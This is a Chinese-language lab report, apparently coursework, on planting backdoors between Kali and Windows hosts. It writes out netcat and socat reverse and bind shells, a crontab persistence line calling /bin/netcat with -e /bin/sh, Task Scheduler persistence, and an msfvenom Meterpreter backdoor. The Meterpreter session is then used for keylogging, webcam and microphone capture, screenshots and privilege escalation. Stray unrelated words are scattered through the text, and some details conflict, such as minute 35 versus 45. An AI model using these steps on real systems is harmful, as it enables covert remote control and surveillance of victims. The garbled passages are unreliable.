在Windows下使用ipconfig查看本機IP
使用ncat.exe程序監聽本機的5305端口
在Kali環境下,使用nc指令的-e選項反向鏈接Windows主機的5305端口
成功得到Kali的shell
以下圖所示
linux
在Kali環境中使用ifconfig查看IP:
web
使用nc指令監聽5305端口:
shell
在Windows下,使用ncat.exe程序的-e選項項反向鏈接Kali主機的5305端口:
windows
Kali下能夠看到Windows的命令提示,能夠輸入Windows命令:安全
Windows下監聽5305端口
Kali下鏈接到Windows的5305端口
創建鏈接以後,就能夠傳輸數據了
以下圖:
網絡
在Windows系統下,監聽5305端口:
tcp
用crontab -e指令編輯一條定時任務
在最後一行添加35 * * * * /bin/netcat 192.168.1.176 5305 -e /bin/sh,意思是在每一個小時的第45分鐘反向鏈接Windows主機的5305端口:工具
當時間到了11點35時,此時已經得到了Kali的shell,能夠輸入指令:ui
在win10系統下,右擊屏幕左下角windows圖標,選擇「計算機管理」。
在任務計劃程序建立任務,填寫任務名稱,並新建一個觸發器。
3d
在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5305 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口5305,同時把cmd.exe的stderr重定向到stdout上:
建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行:
此時,在Kali環境下輸入指令socat - tcp:192.168.1.176:5305,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的端口,此時能夠發現已經成功得到了一個cmd shell:
輸入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.133 LPORT=5303 -f exe > 20155303_backdoor.exe
生成後門程序:
在Windows下執行ncat.exe -l 5305 > 20165305_backdoor.exe
經過nc指令將生成的後門程序傳送到Windows主機上:
在Kali上使用msfconsole指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口:
設置完成後,執行監聽:
運行Windows下的後門程序:
此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell:
使用record_mic指令能夠截獲一段音頻:
使用webcam_snap指令可使用攝像頭進行拍照:
使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:
使用screenshot指令能夠進行截屏:
使用getuid指令查看當前用戶,使用getsystem指令進行提權
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
密碼破解後門,當本身的祕密強度很弱的話,很容易被別人破解進入本身的系統。
(2)例舉你知道的後門如何啓動起來(win及linux)的方式?
當主機處於睡眠狀態也就是表明着這時沒有人使用電腦時自啓動。
(3)Meterpreter有哪些給你映像深入的功能?
使用netcat獲取主機操做Shell,cron啓動,添加35 * * * * /bin/netcat 192.168.1.176 5305 -e /bin/sh,在每一個小時的第35分鐘反向鏈接Windows主機的5305端口,獲去被控主機的音頻、圖像等
(4)如何發現本身有系統有沒有被安裝後門?
通常就是下載網絡安全的軟件,例如360,實時監控與檢測。
還有就是檢查本身的註冊表裏的信息是否有異常的。